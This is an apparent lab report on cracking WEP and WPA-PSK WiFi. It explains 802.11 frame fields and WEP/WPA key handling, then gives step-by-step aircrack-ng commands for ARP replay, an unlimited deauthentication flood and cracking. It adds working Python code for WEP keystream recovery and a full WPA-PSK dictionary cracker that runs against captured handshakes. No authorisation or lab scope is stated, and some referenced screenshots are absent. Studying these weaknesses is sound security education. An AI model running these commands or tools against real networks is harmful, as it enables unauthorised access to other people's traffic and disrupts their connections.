WiFi security on WPA-PSK/WPA2-PSK
Submitted to:
Step 2: Since we have to work with our wireless card, we first bring up the wireless interface and then put it into monitor mode for packet sniffing. While doing that we also launch Wireshark.

As we can see from the capture above, we have enabled monitor mode and opened Wireshark to capture the traffic on the air. The monitor interface mon0 can be seen in the Wireshark window.

WiFi sniffing is more complicated than wired sniffing because the standard assigns three different operating frequency bands, and a card in monitor mode listens on only one channel at a time:
1. 2.4 GHz (assigned to 802.11b/g/n)
2. 3.6 GHz (already occupied by 802.11y)
3. 4.9/5.0 GHz (for 802.11a/h/j/n)

Since most of UniB's access points are configured to use channel 1, which is centred on 2.412 GHz, we set the monitor interface to channel 1. The status information will then be as follows.

The first channel is centred on 2.412 GHz.

Let's capture WiFi signals on channel 1.

This is how traffic sniffing is done in the wireless world: the radio transmission is exposed to any active or passive attacker within range, and no access to a switch or cable is needed.
Revisiting Wireless Frames

Wireless communication uses frames. The frame header and trailer content are given below:

Above all, the Frame Control field has a more complex structure:

Protocol version: set to zero (0) unless a later revision becomes backward-incompatible.
Type: defines whether the frame is management (set to 00), control (set to 01) or data (set to 10), each with its own subtypes.

ToDS  FromDS  Interpretation
0     0       STA to STA in the same IBSS, no AP is involved
0     1       Exiting the DS (generated by the AP, sent to a STA)
1     0       Entering the DS (sent from a STA to the AP's port access entity)
1     1       Used in a wireless DS (WDS): AP-to-AP relay

More Frag: indicates that more fragments of this frame are to follow, in the case of large frames.
Retry: indicates whether the current frame is an original (set to 0) or a retransmission (set to 1).

Duration/ID: used to set the NAV (Network Allocation Vector). It is the minimum amount of time other STAs need to wait before transmitting.
Address 1/2/3/4: carry the following addresses, whose position depends on the ToDS/FromDS bits:
1. source and destination addresses
2. BSSID address
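The following decoder is an added example (not part of this report) that parses the header fields listed above from raw 802.11 frame bytes: the Frame Control bits, the Duration/ID field, the address roles chosen by the ToDS/FromDS bits, and the Sequence Control field. The two frames at the bottom, and the MAC addresses in them, are constructed for the example; control frames, which use shorter headers, are rejected rather than parsed.

```python
import struct

# Added example: decoder for the 802.11 MAC header fields described above.
# The frames at the bottom are constructed for this example, not captured traffic.

FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}

# (ToDS, FromDS) -> (meaning, roles of Address 1..3, plus Address 4 for WDS)
DS_TABLE = {
    (0, 0): ("STA to STA in the same IBSS, no AP involved", ("DA", "SA", "BSSID")),
    (0, 1): ("exiting the DS (AP to STA)", ("DA", "BSSID", "SA")),
    (1, 0): ("entering the DS (STA to AP)", ("BSSID", "SA", "DA")),
    (1, 1): ("WDS, AP-to-AP relay", ("RA", "TA", "DA", "SA")),
}


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_frame_control(fc):
    """Decode the 2-byte Frame Control field (sent least-significant byte first)."""
    if len(fc) != 2:
        raise ValueError("frame control is exactly 2 bytes")
    b0, flags = fc[0], fc[1]
    return {
        "protocol_version": b0 & 0x03,          # 0 for every 802.11 revision so far
        "type": FRAME_TYPES[(b0 >> 2) & 0x03],  # 00 management, 01 control, 10 data
        "subtype": (b0 >> 4) & 0x0F,            # e.g. 8 = beacon, 12 = deauthentication
        "to_ds": flags & 0x01,
        "from_ds": (flags >> 1) & 0x01,
        "more_frag": bool(flags & 0x04),        # more fragments of this frame follow
        "retry": bool(flags & 0x08),            # 1 = retransmission, 0 = original
        "power_mgmt": bool(flags & 0x10),
        "more_data": bool(flags & 0x20),
        "protected": bool(flags & 0x40),        # body is encrypted (WEP/TKIP/CCMP)
        "order": bool(flags & 0x80),
    }


def parse_mac_header(frame):
    """Parse Frame Control, Duration/ID, the address fields and Sequence Control
    of a management or data frame (control frames use shorter headers)."""
    fc = parse_frame_control(frame[0:2])
    if fc["type"] == "control":
        raise ValueError("control frames are not handled by this parser")
    duration = struct.unpack_from("<H", frame, 2)[0]   # NAV in microseconds
    meaning, roles = DS_TABLE[(fc["to_ds"], fc["from_ds"])]
    addrs = [frame[4:10], frame[10:16], frame[16:22]]
    seq_ctrl = struct.unpack_from("<H", frame, 22)[0]
    body_offset = 24
    if len(roles) == 4:                                 # WDS frames carry Address 4
        addrs.append(frame[24:30])
        body_offset = 30
    return {
        "fc": fc,
        "duration": duration,
        "ds_meaning": meaning,
        "addresses": {role: mac_str(a) for role, a in zip(roles, addrs)},
        "fragment_number": seq_ctrl & 0x0F,
        "sequence_number": seq_ctrl >> 4,
        "body": frame[body_offset:],
    }


# Constructed sample frames (all addresses are made up):
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("0a1b2c3d4e5f")
BROADCAST = b"\xff" * 6

# Beacon: type 0 (management), subtype 8, no DS bits, sequence number 0x2a0
BEACON = (b"\x80\x00" + b"\x00\x00" + BROADCAST + AP_MAC + AP_MAC
          + struct.pack("<H", 0x2a0 << 4))

# WEP-protected data frame from the AP to the STA (FromDS=1, Protected): flags 0x42
DATA_FROM_AP = (b"\x08\x42" + struct.pack("<H", 44) + STA_MAC + AP_MAC
                + bytes.fromhex("c0ffee000001") + struct.pack("<H", 0x1f << 4)
                + b"\x00" * 8)

if __name__ == "__main__":
    for name, frame in (("beacon", BEACON), ("data", DATA_FROM_AP)):
        print(name, parse_mac_header(frame))
```

The Protected bit is the quickest way to tell WEP/WPA data frames from unencrypted ones in a capture, and the FromDS/ToDS pair tells you which address field holds the BSSID you will later pass to airodump-ng and aireplay-ng.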
WLAN Authentication

Authentication in wireless systems takes two forms:

Open authentication: no actual authentication takes place. Only two frames (request and response) are exchanged and authentication ends.

Shared-key authentication: the AP sends a challenge, and the STA returns the challenge encrypted using the WEP key. WEP uses the RC4 stream cipher. Because an eavesdropper sees both the plaintext challenge and its ciphertext, this exchange leaks an RC4 keystream for the IV used, which is why shared-key authentication is considered weaker than open authentication on a WEP network.
Wired Equivalent Privacy (WEP)

It is the first encryption standard made available for WiFi. It uses RC4, a symmetric stream cipher: both the AP and the STAs share the same pre-shared key.

The actual IV values

WEP step 3: ciphertext generation

Concatenated data and ICV

WEP Decryption

If the ICV computed in the AP is the same as the one sent by the STA, the message is accepted as unaltered. Note that the ICV is a plain CRC-32, not a keyed MAC: it detects transmission errors, but since it is linear and unkeyed it does not stop a deliberate modification by an attacker.
The captured ARP packet is replayed blindly until the network replies; then we have a winner, because every reply is a fresh encrypted frame with a new IV.
ARP packets can be recognised even when encrypted because they have a fixed size and are sent to the broadcast MAC address.
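As an added example (not code from this report), the following script implements the WEP steps described above: the ICV, the RC4 keystream seeded with IV || key, encryption of data || ICV, and decryption with the ICV check. It then shows why the ARP replay above is worth doing: an ARP request has a predictable plaintext, so one captured ARP frame lets an attacker who knows no key recover the keystream for that IV and decrypt any other frame sent under the same IV. The key, IV, ARP request and "secret" frame are all constructed for the example; the statistical key recovery that aircrack-ng performs over many IVs is a separate technique and is not shown here.

```python
import os
import struct
import zlib

# Added example: WEP encryption, decryption and ICV check, followed by the
# known-plaintext keystream recovery that makes IV reuse fatal.
# Key, IV and frames are constructed for this example.


def rc4(key, data):
    """RC4: key scheduling (KSA) then the keystream generator (PRGA) XORed over data."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(plaintext):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(wep_key, plaintext, iv=None, key_id=0):
    """Seed = IV || key; body = RC4(seed) XOR (plaintext || ICV).
    Returns the 4-byte WEP header (IV, key-ID byte) followed by the encrypted body."""
    if iv is None:
        iv = os.urandom(3)               # only 24 bits: IV collisions are inevitable
    body = rc4(iv + wep_key, plaintext + icv(plaintext))
    return iv + bytes([key_id << 6]) + body


def wep_decrypt(wep_key, frame_body):
    """Regenerate the keystream from IV || key, strip the ICV and verify it."""
    iv, ct = frame_body[:3], frame_body[4:]
    pt = rc4(iv + wep_key, ct)
    plaintext, received_icv = pt[:-4], pt[-4:]
    if icv(plaintext) != received_icv:
        raise ValueError("ICV mismatch: frame altered or wrong key")
    return plaintext


def recover_keystream(frame_body, known_plaintext):
    """Ciphertext XOR (known plaintext || its ICV) gives the RC4 keystream for that IV."""
    expected = known_plaintext + icv(known_plaintext)
    return bytes(c ^ p for c, p in zip(frame_body[4:], expected))


def decrypt_with_keystream(frame_body, keystream):
    """Decrypt another frame sent under the same IV without knowing the key.
    Only as many bytes as the recovered keystream covers can be decrypted."""
    n = min(len(frame_body) - 4, len(keystream))
    pt = bytes(c ^ k for c, k in zip(frame_body[4:4 + n], keystream))
    return pt[:-4] if n == len(frame_body) - 4 else pt   # drop ICV if fully covered


WEP_KEY = bytes.fromhex("0102030405")   # 40-bit key (constructed)
IV = b"\x1a\x2b\x3c"

# LLC/SNAP header + ARP request "who-has 192.168.1.1 tell 192.168.1.10" (constructed).
# An ARP request has a fixed length and a mostly fixed layout, so its plaintext is
# predictable even though the frame on the air is encrypted.
ARP_REQUEST = (bytes.fromhex("aaaa030000000806")           # LLC/SNAP, EtherType ARP
               + bytes.fromhex("0001080006040001")         # Ethernet/IPv4, opcode request
               + bytes.fromhex("0a1b2c3d4e5f") + bytes([192, 168, 1, 10])
               + bytes(6) + bytes([192, 168, 1, 1]))


def iv_reuse_demo():
    """Encrypt an ARP request and a second frame under the same IV, then read the
    second frame using only the keystream recovered from the ARP request."""
    enc_arp = wep_encrypt(WEP_KEY, ARP_REQUEST, IV)
    secret = b"GET /login?pw=hunter2 HTTP/1.0\r\n"      # shorter than the ARP frame
    enc_secret = wep_encrypt(WEP_KEY, secret, IV)        # same IV reused
    keystream = recover_keystream(enc_arp, ARP_REQUEST)  # attacker knows no key
    return decrypt_with_keystream(enc_secret, keystream)


if __name__ == "__main__":
    print(wep_decrypt(WEP_KEY, wep_encrypt(WEP_KEY, ARP_REQUEST, IV)) == ARP_REQUEST)
    print(iv_reuse_demo())
```

With a 24-bit IV a busy access point cycles through the whole IV space in hours, and the ARP replay attack forces that to happen in minutes, so the keystream reuse shown by iv_reuse_demo is not a corner case but the normal state of a WEP network under attack.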
Step 1: let's capture traffic in monitor mode
root@ubuntu:~# airodump-ng --channel 1 mon0
Step 2: let's now select our BSSID and save the capture to a file
root@ubuntu:~# airodump-ng --channel 1 --bssid <MAC_of_AP> --write onlinecracking mon0
Step 3: now let's blindly send the ARP replay attack
root@ubuntu:~# aireplay-ng --arpreplay -b <MAC_of_AP> mon0
Step 4: let's break the connection between a node and the AP (a count of 0 keeps sending deauthentication frames until stopped)
root@ubuntu:~# aireplay-ng --deauth 0 -a <MAC_of_AP> mon0
Step 5: let's send ARP requests and simulate ARP responses, using the client's MAC as source so the AP accepts the replayed frames
root@ubuntu:~# aireplay-ng --arpreplay -b <MAC_of_AP> -h <client_MAC> mon0
Step 6: at this point airodump-ng is recording the sniffed packets in the onlinecracking capture file. Now let's go to the real cracking part. We pass the onlinecracking-01.cap file to aircrack-ng:
root@ubuntu:~# aircrack-ng onlinecracking-01.cap
Understanding WPA/WPA2

WPA: an intermediate solution for WiFi security. It uses TKIP (Temporal Key Integrity Protocol), which is built on the same RC4 cipher as WEP; WPA2 replaced it with AES-based CCMP.

WPA-PSK: is vulnerable to a dictionary attack. The input required for this attack is the WPA 4-way handshake between the AP and the client, plus a wordlist containing common passphrases.

PMK (Pairwise Master Key): all other keys are derived from it. It is generated on both the AP and the client from the passphrase and the SSID, so it never crosses the air.

Nonce (ANonce): a long random value sent by the AP as a challenge to the client.
The cracking of WPA-PSK is done by implementing a dictionary attack. The steps are as follows:
Step 1: sniff the air for packets
Step 2: capture and save the desired AP's sniffed traffic
Step 3: let a new client connect and capture the 4-way WPA handshake packets, or send deauthentication packets to force a client to reconnect
Step 4: airodump-ng will show the handshake, and we launch Wireshark to capture the packets. Concentrate on the EAPOL packets: they carry the authentication 4-way handshake that enables us to crack the passphrase.
Step 5: we prepare a dictionary of common passphrases and pass it to aircrack-ng
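The following script is an added example (not code from this report or from aircrack-ng) of what step 5 does internally: it derives the PMK from a candidate passphrase and the SSID, expands it into the PTK using both MAC addresses and both nonces, recomputes the MIC of handshake message 2 with the first 16 bytes of the PTK (the KCK), and compares it with the captured MIC. A matching MIC means the candidate is the passphrase. The SSID, MAC addresses, nonces and wordlist are constructed for the example, and the client side is simulated (sta_sign_msg2) so that a "captured" message 2 exists to attack; in practice these values come from the beacon and the EAPOL frames in the capture. Descriptor version 1 (WPA/TKIP, HMAC-MD5) and version 2 (WPA2/CCMP, HMAC-SHA1) are both handled.

```python
import hashlib
import hmac
import struct

# Added example: the WPA-PSK key derivation and the dictionary attack that aircrack-ng
# performs over it. The handshake values below are constructed for this example and
# the STA side is simulated so that the captured MIC can be verified offline.

EAPOL_MIC_OFFSET = 81      # EAPOL header (4) + Key Descriptor fields up to the Key MIC


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The same computation runs on the AP and the client; the PMK never crosses the air."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, length):
    """802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:length]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce, length=64):
    """PTK from the PMK, both MAC addresses and both nonces. Its first 16 bytes are the
    KCK, the key that authenticates (MICs) the handshake messages."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, length)


def eapol_mic(kck, eapol_frame, version):
    """Key MIC over the whole EAPOL-Key frame with the MIC field zeroed:
    HMAC-MD5 for descriptor version 1 (WPA/TKIP), HMAC-SHA1 for version 2 (WPA2/CCMP)."""
    zeroed = eapol_frame[:EAPOL_MIC_OFFSET] + bytes(16) + eapol_frame[EAPOL_MIC_OFFSET + 16:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def build_eapol_msg2(snonce, version):
    """Message 2 of the 4-way handshake (STA -> AP): carries SNonce and a MIC (zeroed here)."""
    descriptor_type = 254 if version == 1 else 2    # WPA uses 0xFE, WPA2/RSN uses 2
    key_info = 0x0108 | version                     # pairwise, MIC bit, descriptor version
    body = (bytes([descriptor_type]) + struct.pack(">H", key_info) + struct.pack(">H", 0)
            + struct.pack(">Q", 1)                  # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, key IV, RSC, key ID
            + bytes(16)                             # Key MIC placeholder
            + struct.pack(">H", 0))                 # key data length (no key data)
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # EAPOL v1, type 3 = Key


def sta_sign_msg2(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, version):
    """What a legitimate client does: derive the PTK and fill in the MIC."""
    frame = bytearray(build_eapol_msg2(snonce, version))
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame), version)
    return bytes(frame)


def crack_wpa_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """The dictionary attack: for each candidate passphrase recompute PMK, PTK and MIC
    and compare with the MIC captured in message 2. Everything else is public."""
    version = eapol_msg2[6] & 0x07                 # low 3 bits of Key Information
    captured_mic = eapol_msg2[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, version), captured_mic):
            return candidate
    return None


# Constructed handshake parameters (real ones come from the beacon and the EAPOL capture):
SSID = "example-ssid"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("0a1b2c3d4e5f")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
WORDLIST = ["password", "12345678", "letmein123", "qwertyuiop"]


def demo(version=2):
    """Capture a (simulated) message 2 signed with a weak passphrase and recover it."""
    captured = sta_sign_msg2("letmein123", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, version)
    return crack_wpa_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured, WORDLIST)


if __name__ == "__main__":
    print("WPA2 (CCMP):", demo(2))
    print("WPA (TKIP):", demo(1))
```

The 4096-iteration PBKDF2 per candidate is the whole cost of the attack and the only thing slowing it down, which is why the SSID acts as a salt (precomputed tables work for one SSID only) and why a passphrase that appears in a wordlist offers no protection regardless of how strong the rest of WPA2 is.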